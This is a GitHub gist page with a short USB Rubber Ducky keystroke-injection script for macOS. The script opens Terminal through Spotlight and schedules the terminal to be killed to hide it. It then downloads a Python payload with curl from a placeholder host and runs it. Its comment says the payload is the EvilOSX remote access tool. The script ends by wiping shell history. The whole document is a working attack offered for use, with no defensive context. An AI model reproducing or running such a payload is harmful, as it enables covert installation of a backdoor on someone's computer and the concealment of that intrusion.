Skip to content

Instantly share code, notes, and snippets.

@darbym
Created May 11, 2018 15:40
Show Gist options
  • Save darbym/34c9a0b756366b88ae49f0717c729a52 to your computer and use it in GitHub Desktop.
Save darbym/34c9a0b756366b88ae49f0717c729a52 to your computer and use it in GitHub Desktop.
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM Also see https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment